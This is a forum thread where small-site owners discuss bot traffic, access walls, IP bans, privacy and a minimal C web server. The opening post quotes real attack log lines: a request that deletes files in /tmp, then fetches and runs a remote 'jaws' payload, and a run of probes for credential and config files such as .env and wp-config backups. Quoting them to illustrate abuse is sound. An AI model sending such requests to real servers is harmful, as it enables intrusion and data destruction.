Author Topic: how do you feel about website access?  (Read 705 times)
j
Full Member ⚓︎
« on: November 05, 2023 @616.72 »

daily, i get requests to my site like this:

Quote
"GET / HTTP/1.1" 200 726 "-" "A company searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: email"

... and this:

Quote
"GET /shell?cd+/tmp;rm+-rf+*;wget+IP/jaws;sh+/tmp/jaws HTTP/1.1"

sometimes i get blocks of requests from the same agent:

Quote
"GET /.env HTTP/1.1"
"GET /wp-config.php.bak HTTP/1.1"
"GET /wp-config.php~ HTTP/1.1"
"GET /phpinfo.php HTTP/1.1"
"GET /info.php HTTP/1.1"
"GET /.vscode/sftp.json HTTP/1.1"
"GET /sftp-config.json HTTP/1.1"

... sent minutes apart, regardless of whether they get a 200.



the above doesn't particularly affect security, now that hardened software behemoths like apache, nginx and lighttpd exist. yet these redundant requests can still hinder the servers my friends run, where connections like dial-up are still in use (or where folks use nearlyfreespeech.net!), and where the number of requests you receive matters as much as the amount of data being transferred. the web is still extraordinarily heavy compared to protocols like spartan, nex and justtext, and every self-hosting person i've asked has reported receiving the same kinds of requests as the above.

my answer to the above is to add walls to my site:

- visitors email me asking for access to the site and telling me a little bit about why they're interested in reading - a little bit of human connection!
- i respond with a key they can append to their URL which lets them see content (e.g. http://website.com?key=letmein)
- agents trying to access my domain have three lifetime do-overs - where they can make a bad request - before their IP is permanently blacklisted

this has worked pretty well with my code (which folks can email me for) at least.
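for the curious: a minimal sketch of what the key check could look like, in C. the file name and buffer sizes here are invented, and my real code (the one you can email me for) does more - but the shape is this:

Code:
/* sketch: look for "?key=..." in the request line and check it
   against a list of issued keys, one per line in KEYFILE */
#include <stdio.h>
#include <string.h>

#define KEYFILE "keys.txt"   /* hypothetical key store */

int key_is_valid(const char *request_line)
{
    const char *q = strstr(request_line, "?key=");
    if (!q)
        return 0;
    q += strlen("?key=");

    char key[64];
    size_t n = strcspn(q, " \r\n&");  /* key ends at space, CRLF or '&' */
    if (n == 0 || n >= sizeof key)
        return 0;
    memcpy(key, q, n);
    key[n] = '\0';

    FILE *f = fopen(KEYFILE, "r");
    if (!f)
        return 0;
    char line[64];
    int ok = 0;
    while (fgets(line, sizeof line, f)) {
        line[strcspn(line, "\r\n")] = '\0';
        if (strcmp(line, key) == 0) { ok = 1; break; }
    }
    fclose(f);
    return ok;
}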

how do other folks feel about this? do you think defending your website aligns with what the web is now? if so, how would you approach mitigating the sheer amount of bloat and bots that scrape sites? and would my approach deter you from visiting my site if it were implemented?
« Last Edit: November 05, 2023 @619.62 by j »

i go by j, she/they :)
Melooon
Hero Member ⚓︎
« Reply #1 on: November 05, 2023 @652.58 »

That's a fun solution, and it definitely opens the door for you to play with the idea a bit and make your site more unique! I assume if you're giving everyone personal access keys then you can also code the site to personalise itself to each key? Maybe make their name appear or allow them to have a favourite colour that changes the design  :grin: You could even make a personalised newsletter that emails them only things they haven't read.
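Just to sketch the idea (totally hypothetical keys, names and colours here!), the key lookup could double as a tiny preferences table:

Code:
/* hypothetical sketch: each issued key maps to a visitor's name
   and favourite colour, which the page template can use */
#include <string.h>

struct visitor {
    const char *key;
    const char *name;
    const char *colour;   /* e.g. used as the page background */
};

/* both entries are made-up examples */
static const struct visitor visitors[] = {
    { "letmein", "j",       "#aaffcc" },
    { "melon42", "Melooon", "#ffddaa" },
};

const struct visitor *lookup_visitor(const char *key)
{
    for (size_t i = 0; i < sizeof visitors / sizeof visitors[0]; i++)
        if (strcmp(visitors[i].key, key) == 0)
            return &visitors[i];
    return NULL;   /* unknown key: fall back to the plain page */
}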

Although... I suppose on the flip side to that, you'd also have to track each personal access key to log what individuals are reading on your site  :tongue: (I'm not denouncing this; used altruistically this is great info for any writer/blogger, but it does run the risk of spoiling the writer's direction of interest! It may also deter some people from visiting.)

As far as I know the Neocities approach is to simply overwhelm bots with resources - e.g. if you have 500 visitors and 5000 bots, then you make your server able to handle 20,000 visitors/bots.

That's an approach I tend to try and replicate; I always make sure that there are at least 3x more resources than necessary since the pain of things going offline at a bad moment is more than the pain of providing the resources.

That's definitely not a good approach for anyone self-hosting on dialup or using a very low-power server; but for anyone using VPS hosting it's a viable system. There is always a limit to the number of bots that can exist, since they suffer exactly the same bandwidth limits web hosts do, so I suppose they will always balance each other out  :eyes:


everything lost will be recovered, when you drift into the arms of the undiscovered
brisray
Full Member ⚓︎
« Reply #2 on: November 08, 2023 @592.58 »

Just my tuppence worth, I find any sort of restriction on me viewing a website puts me off of it for a long time. I do sign up for sites, but only if they have enough viewable content to make me interested in what else they have.

Just some thoughts on traffic and bots in general...

The second you open a computer up on the web the bots will find it. I found that out over 20 years ago. They don't just crawl the sites; I've had automated attacks against both the web and FTP servers I run. Although I've hardened the servers as much as I can, I am certain I couldn't stop a determined attack against them.

I've been playing around with my old web logs. Even in 2011 - the oldest logs I've still got - bots were responsible for twice the number of visits as humans (well, almost all humans; it's hard to tell if I missed some): June 2011 - 8,449 pages (human) vs 17,476 (bots). It's only gotten worse: October 2023 - 34,100 (human) vs 918,543 (bots).

The server (Apache) can easily cope with the traffic - I keep track of that as well, and my ISP hasn't complained about the bandwidth usage. If you're using dial-up then it might be a problem.

If the bots get too much, I'll send them off somewhere - maybe the black hole of 0.0.0.0 or a Japanese porn site or something.

The largest bot visits I get are my own fault. A startup penetration testing company made me an offer I couldn't refuse - free scans for life! Once a month they crawl every file on my largest site as well as poke around to see if they can get out of the server. Guess what my biggest security risk is? Making the logs and server status page public - too much information about what's going on behind the public face of the sites.

j
Full Member ⚓︎
« Reply #3 on: November 16, 2023 @712.43 »

i appreciate the ideas!

Quote from: Melooon
... you can also code the site to personalise itself to each key?

that's a really good idea that i hadn't thought of - though i'll leave that up to somebody with a more creative site than i. i'm going to work on a minimalist webserver soon that incorporates the original idea so my code will be reachable somewhere eventually!

the approach i'm planning on taking is very bland and uncreative, but could be modified: i just plan on disconnecting the user without serving any data, given that i'm working with plain old TCP/IP. there'll be a tmpfile() somewhere that keeps track of requested 404s per device; when too many are requested they'll just be dropped, which saves a ton of resources!
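roughly what i have in mind, as a sketch (invented names, and counting in memory rather than in the tmpfile, but the logic is the same):

Code:
/* sketch: count 404s per IP; report when an IP passes the
   limit so the server loop can just drop the connection.
   a tmpfile()/on-disk version works the same, with persistence. */
#include <string.h>

#define MAX_PEERS   1024
#define MAX_STRIKES    3

static struct { char ip[46]; int strikes; } peers[MAX_PEERS];
static int npeers;

/* call on every 404; returns 1 once the IP should be dropped */
int record_404(const char *ip)
{
    for (int i = 0; i < npeers; i++) {
        if (strcmp(peers[i].ip, ip) == 0)
            return ++peers[i].strikes >= MAX_STRIKES;
    }
    if (npeers < MAX_PEERS) {
        strncpy(peers[npeers].ip, ip, sizeof peers[npeers].ip - 1);
        peers[npeers].ip[sizeof peers[npeers].ip - 1] = '\0';
        peers[npeers++].strikes = 1;
    }
    return 0;
}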

i like the ideas and considerations, though :P

i go by j, she/they :)
dirtnap
Casual Poster
« Reply #4 on: December 02, 2023 @460.59 »

on the actual problem: this isn't about palo alto's detested crawler, is it? the one that flagrantly ignores robots.txt?

are you not able to block access to your server according to user-agent? because frankly, if not, i'd say that's the bigger issue here. since this crawler's ua is comically recognisable, it should be possible to block any request containing the phrase "expanse, a palo alto", or for that matter probably just "palo alto".
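for a hand-rolled server, that check could be as small as the sketch below - the phrase and function names are just examples, and since strcasestr isn't standard C there's a tiny helper:

Code:
/* sketch: reject a request whose User-Agent contains a blocked
   phrase, compared case-insensitively */
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

static const char *ci_strstr(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++)
        if (strncasecmp(hay, needle, n) == 0)
            return hay;
    return NULL;
}

/* returns 1 if the User-Agent should be blocked */
int ua_is_blocked(const char *user_agent)
{
    return ci_strstr(user_agent, "palo alto") != NULL;
}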

i think blocking the offending crawler (which, again, should be simple to do via the recognisable ua) is a much more reasonable response to the problem of one crawler generating too much traffic than...denying everyone access to your site.

because in response to your final question:

Quote
would my approach deter you from visiting my site if it were implemented?

i would think "well that's a novel way to harvest emails", close the tab, and forget about your site.

any site that requires me to do anything to view it beyond select a language loses my interest immediately. i'm certainly not handing over my email just to fucking read. i'm extremely tired of forums that require an account to view, and i'm certainly not making an account to view whatever your site is - and yes, requiring someone to send an email and get a unique key is in any functional sense making an account.

no js no shoes no problem
j
Full Member ⚓︎
« Reply #5 on: December 02, 2023 @566.04 »

nope - not /just/ palo alto! i get a bunch of requests which don't share a consistent pattern of identification, so i would have to fall back upon a big list of (hopefully static) IPs to block from my site. the issue there is time; eventually those IPs would belong to other people, who could be left scratching their heads when they get a 403.

some extra context for why i created this post:

Spoiler
whilst this topic is entirely hypothetical, it's also oriented around my hosting experience and my plans for hosting in the future. sometime next year i plan on transitioning from renting a VPS monthly to using nearlyfreespeech.net for everything - partly because everything's packaged in one place which doesn't use a subscription-based model /or/ contracts. i can put all of my files in one place, top up my balance and forget about it - much like my phone.

nearlyfreespeech doesn't permit the hosting of non-web software which doesn't speak the HTTP protocol - so my intention is to "de-bloat" the way HTTP works by stripping it down to its essentials; you'd only be able to send GET requests concatenated with a path - and SSL (amongst other things) would be entirely unsupported. this works for me - and as long as web browsers can access a page without issue, i'm not really fussed that it breaks web standards. all i have to do is get the OK from nearlyfreespeech, write a server and sign up, then i'm set to go.

the issue with this is that nearlyfreespeech charges based on bandwidth, server resources and storage. server resources i can mitigate by writing clean code (oh boy are asynchronous requests not going to exist on my server! just like how phones used to work in the 90s, folks are going to have an operator [the server] that connects them one-by-one in order, until a timeout), and i don't need to compensate for storage because my files are already tiny enough for it not to be an issue. the biggest problem is bandwidth. how i'm imagining my software right now is with my money in mind: if you request a non-existent page three times in a row then you'll be blocked for a month. instead of returning some arbitrary response code (that's three whole bytes of data - mind you!), you'll just be disconnected as soon as you connect to the server - if you're already on the no-fly list, so to speak (there's a little sketch of this after the spoiler). and i don't mind the block length being imprecise: i'd probably write a little shellscript that deletes the blocked IP list on a weekly basis anyway.

emailing would really be a last step solution to mitigating traffic that i'd only implement if i absolutely had to.
[close]
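here's that sketch - invented file name, and the weekly cleanup would just be a cron job truncating the blocklist:

Code:
/* sketch: right after accept(), look the peer up in the
   blocklist and hang up immediately if it's there - no status
   line, no bytes, just a closed socket. */
#include <stdio.h>
#include <string.h>

#define BLOCKLIST "blocked_ips.txt"  /* one IP per line; a weekly
                                        cron job truncates it */

static int ip_is_blocked(const char *ip)
{
    FILE *f = fopen(BLOCKLIST, "r");
    if (!f)
        return 0;
    char line[64];
    int hit = 0;
    while (fgets(line, sizeof line, f)) {
        line[strcspn(line, "\r\n")] = '\0';
        if (strcmp(line, ip) == 0) { hit = 1; break; }
    }
    fclose(f);
    return hit;
}

/* in the accept loop:
   if (ip_is_blocked(peer_ip)) { close(conn); continue; } */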

Quote from: dirtnap
any site that requires me to do anything to view it beyond select a language loses my interest immediately. [...] and yes, requiring someone to send an email and get a unique key is in any functional sense making an account.

it's great to hear somebody as against accounts as i am, but i'd be interested to hear just how far your adamancy extends before you have to compromise, and compare your experience to mine!

for instance, you're on Melonland - and i would assume that you have at least a couple of accounts on sites that governments (or whoever) have forced you to register with (i know i have!). should password managers even exist? similarly, chan boards are known for being not-the-best which is often attributed to their anonymity - do you think that pushing content to the web (in whichever form, websites included) should require something that defeats your anonymity? if so: why do you have this mindset - is it because you don't trust whoever is at the other end to keep your data secure and away from third-party fingerprinting, or is it because it's inconvenient to register for a site - or some other reason?

anyway, the biggest issue with website access is that it's multifaceted, like all cybersecurity is. i can't write the perfect server that accounts for all the issues i'll ever have or could ever have - that doesn't exist and never will, because there are far too many bad actors. the web has been going so long now that its principles outright contradict one another: why would you ever trust a client to honour your robots.txt, but also suspect your client enough to require a user-agent? i'm sure the latter exists for debugging purposes because browsers have different implementations - but at that point, why do separate browsers exist? surely, as long as the same javascript version is shared, and the same binary formats are shared [for stuff like images], we don't need firefox, librewolf, links, lynx, badwolf, qutebrowser, opera, chrome, edge, internet explorer, elinks, dillo, brave, netsurf, safari, chromium, icecat, palemoon, seamonkey, w3m, vivaldi ... you see my point? that's a bit of a tangent - but i hope this last paragraph clarifies that this isn't just a response to being fed up with a bunch of crawler requests - it's an attempt to both fix and personalize the web to me.

i go by j, she/they :)
dirtnap
Casual Poster
« Reply #6 on: December 03, 2023 @460.34 »

i misunderstood, i thought the majority of your bot traffic was palo alto. there have been reports of their crawlers getting stuck in a loop and making the exact same request hundreds of times in short order. and then repeating that multiple times a day.

in this case, i can understand needing to take stricter measures.

Quote
if you request a non-existent page three times in a row then you'll be blocked for a month.

personally, i'd trial a week and then dial the block-time up if you still feel you're responding to too many requests. in principle, though, an automatic ip ban with an expiration is certainly one of the least drastic solutions i could think of for this problem. i'd be very interested in learning how it works out for you once it's set up.

Quote from: j
it's great to hear somebody as against accounts as i am, but i'd be interested to hear just how far your adamancy extends before you have to compromise, and compare your experience to mine!

interesting! alright. i'd say that broadly i'm resistant to having to interact with a site beyond the most basic interactions necessary to view it. when cookie banners became A Thing i reconfigured my adblocker to hide them, because the simple act of clicking "agree" or "close" or whatever was just a step too far for me. not that clicking those was too great a physical effort or anything, just that i didn't like being forced to acknowledge it in any way. i didn't want the servers to have the satisfaction of receiving that response.

if that sounds petty, i wouldn't disagree. i'm very resistant to doing what's expected of me (when i have not previously assented that this expectation can be made), to the point that it's probably a personality flaw.


Quote from: j
for instance, you're on Melonland - and i would assume that you have at least a couple of accounts on sites that governments (or whoever) have forced you to register with (i know i have!).

i would attribute my making an account here entirely to the fact that i could read the forums freely without one. i read quite a lot before i made an account, and i still do mostly read while logged out.

tangentially to this, quite a lot of forums i used to frequent have gone login-to-view, which, despite the fact that i have accounts there of old, has dissuaded me from logging in again. i think, i should check up on this forum! oh. need to login.

nevermind.

as for my government (or whatever) forcing me to make an account...i'm assuming you mean web accounts because, depending on how you look at it, having a national insurance number functionally is having an account with my government.

funnily enough, i don't think i do?

i'm welsh, and both the welsh and english governments (wales isn't entirely devolved and still takes much of its law and governmental stuff from england) are quite enthusiastic about making things available online but thus far nothing is exclusively online, at least not that i'm aware of.

for example, the government has its own official petition site. (discourse about that set aside for brevity) it's certainly an effective tool for ensuring that there is one(1) petition for something. if everyone is signing the same petition, you do increase the efficacy of any given petition. however...you're not required to use it. you can still run petitions on paper the old-fashioned way, without involving the website at all.

i'm vaguely aware that a lot of government stuff like taxes, benefits, nhs, and housing can be handled online now but i say vaguely because i've never even looked at the webportal(s) for these things. i have no interest in adding another point of failure for such vital aspects of my continued existence, let alone personal data. (i do not trust the government's cybersecurity, or cyber-anything for that matter)

the most recent census could apparently be filled in online, the thought of which horrifies me for the aforementioned reason. i filled in the paper one that came in the post.

Quote from: j
should password managers even exist?

the first time i heard of a password manager, i thought "what a brilliant scam". i couldn't believe they were real things that were genuinely designed to help. you install this thing in your browser, and let it keep (and/or invent for you) a list of user/pass for every site you visit. does this not look exactly like those datamining and adware toolbars that used to plague browsers to anyone else?

i'm aware that (at least some; there are probably some scam ones out there by now) password managers were created out of a genuine desire to help improve users' security. but i still can't believe anyone with any real interest in security trusts them. it feels self-defeating to keep a singular database of all your credentials and then trust literally any third party with that database.

indeed, the cloud-based ones have already suffered the predictable leaks.

i don't think password managers as a concept are an inherently bad idea. but i do think all current iterations of such are bad ideas. i think password managers should be standalone software, that doesn't even attempt to access the internet, and which upon installation adds blacklist rules to the local firewall that actively prevents any in/out requests (for the sake of defeating at least the easiest approach to penetration).

even so, i think the concept of a digital password manager on the same device you're using those passwords on is...questionable. that's just asking for trouble.

my password manager is a book. an actual, physical, paper book. the thing i've been taught for decades is the worst possible approach to security.

it's fucking foolproof.

you can't download my book. you can't see it in TeamViewer. it is absolutely impossible for you to know what is in my password book because it isn't digital.

seriously, if you struggle to remember your passwords, just write them down on actual paper.

(i'm aware this is poor security if you work in an office. i'm talking about individual use)




Quote from: j
similarly, chan boards are known for being not-the-best which is often attributed to their anonymity - do you think that pushing content to the web (in whichever form, websites included) should require something that defeats your anonymity?

i used to be a frequenter of various anonymous message boards (not only but certainly including chan-boards) and sometimes still am in places like dreamwidth where anonymous communities continue to thrive.

people who think chan-boards are bad because of the anonymity have it backwards. they're anonymous because they're bad.

they're anonymous because no-one wants to tie themselves concretely to the kind of things their post is proximate to, even if their own post is entirely innocent.

plenty of anon communities continue to thrive without being anything close to the chan-boards in terms of content or meanness simply because...that's not what they're about.

even chan-boards have admins that ban people for violating rules, because they do have rules.

the difference between chan-boards and dreamwidth anon communities is what is and isn't against the rules.

also, formal rules and admins aside, anon communities are often self-policing. if you say something that the community deems unacceptable, the community will deal with you as they see fit. even if they have no power to remove your post, or to ban you, they can tell you, en masse, exactly what was wrong with what you said.

it's a more powerful tool than you might expect. ten, twenty replies to your post all saying some variation of "we don't use that word here" and otherwise ignoring anything else you said...most problem posters either adjust, or leave.

the few that turn troll are handled by the mods.

i made a melonland account because i considered it to be a fair bargain: my email address for permission to participate in what is, essentially, a collaborative art project in the form of a community.

but if i could post here anonymously, i wouldn't have taken that deal. where anonymity is an option, i will usually choose it.

actually, i'd go so far as to say reddit is still an anonymous platform. sure, you need an account to post, but you don't need an email for an account. you can just make an account and not give an email.

throwaways are a whole thing on reddit. people make single-use accounts for discussing one particular topic, for posting one comment or thread. sometimes they're deleted after the fact, sometimes they're just abandoned forever.

they're functionally anonymous.

even when you post somewhere anonymously, you're still giving your ip, or at least an ip.

really, creating a no-email account on reddit is just making it so the public see an arbitrary name you decide instead of your ip.

in fact, "being an ip" is a whole thing in some communities. have you ever looked in the wikipedia forums? yeah, wikipedia has forums. because of dynamic ips, you can't be certain that the ip you're talking to today is the same user you were talking to last month. and quite often, it genuinely isn't.

Quote from: j
if so: why do you have this mindset - is it because you don't trust whoever is at the other end to keep your data secure and away from third-party fingerprinting, or is it because it's inconvenient to register for a site - or some other reason?

the inconvenience is always at least part of my reckoning, and depending on the perceived inconvenience:gain ratio that alone can be enough for me to say "fuck that" and leave.

to some considerable degree it is not trusting the other end with my data. sometimes i assume they want my data for nefarious purposes. big companies like google and adobe come to mind for that. sometimes, even if i believe they have no bad intentions, i still don't trust them to keep it secure.

my sentiment is fairly linear: the fewer databases any given piece of information about me is in, the fewer chances there are for that data to leak.

even if the data is incredibly minor, i still either avoid giving it or give fake data wherever possible.

i don't think any website has my real date of birth, nor do they need it. asking for an exact date is unnecessary. i miss the days of "are you over 18" buttons. the outcome is the same. anyone can lie. but now you've got a database of dates of birth for no good reason.

(as an aside, i despise that all government departments will take knowing my date of birth as proof i am who i say i am. the thing that most people tell their friends! is used as proof of identity! it's fucking idiotic)

the vast majority of steam users were born on the 1st of january, somehow. weird coincidence. wonder why that could be.

i buy digital things quite often. or at least i used to, less so these days. still, when i buy a digital thing, i'm often asked for completely unnecessary information, like my address.

always, i give a blatantly fake address, because you don't need my physical address to email me a fucking zip. (yeah it's for tax reasons or something. i don't care. you're still not getting my address. figure out your tax data by the country my ip shows, it's not hard.)

Quote from: j
anyway, the biggest issue with website access is that it's multifaceted, like all cybersecurity is. [...] it's an attempt to both fix and personalize the web to me.

i understand, and i now appreciate that the Crawler Struggle is bigger than i realised.

no js no shoes no problem
j
Full Member ⚓︎
« Reply #7 on: March 07, 2024 @467.00 »

well! it's been almost four months and i finally got around to making my custom web server that incorporates some of this!

i didn't actually decide to go down the email / tailored key route - the points above really impacted the way i went about things! here's how the server - tinyhtml - works:

- accepts one connection at a time
- fetches data from peer
- checks that the request is a GET request
- tries to open the requested document
- serves 200 / 404 & document content (if any)
- closes connection

most scrapers rely on the web server to redirect from "GET /" to "GET /index.html", which is great for me because the server can absolutely open "/" and will serve one byte of data upon request, meaning that i can share my domain without worry now; only clients that request "index.html" can see what i've written!
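for anyone curious, the core loop looks roughly like this - a simplified sketch, not the real source (the real server does the one-byte trick for "/"; this sketch just silently drops such requests, and error handling is left out):

Code:
/* simplified sketch of tinyhtml: one connection at a time,
   GET only, serve the named file or a 404, then hang up */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(void)
{
    int srv = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(8080);
    bind(srv, (struct sockaddr *)&addr, sizeof addr);
    listen(srv, 1);               /* one connection at a time */

    for (;;) {
        int conn = accept(srv, NULL, NULL);
        if (conn < 0)
            continue;

        char req[1024] = {0}, path[256];
        read(conn, req, sizeof req - 1);     /* fetch request */

        /* only "GET /<name> HTTP/..." is honoured; a bare
           "GET /" matches nothing and the peer is dropped.
           real code must also reject paths containing ".." */
        if (sscanf(req, "GET /%255[^ ] HTTP/", path) == 1) {
            FILE *f = fopen(path, "r");
            if (f) {
                dprintf(conn, "HTTP/1.1 200 OK\r\n\r\n");
                char buf[512];
                size_t n;
                while ((n = fread(buf, 1, sizeof buf, f)) > 0)
                    write(conn, buf, n);
                fclose(f);
            } else {
                dprintf(conn, "HTTP/1.1 404 Not Found\r\n\r\n");
            }
        }
        close(conn);
    }
}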

on top of this, i've realized that trying to implement a ban system is convoluted and not the way forward. instead, i've just written a neat riddle on my homepage that folks need to solve to find any interesting stuff i've written :)

i go by j, she/they :)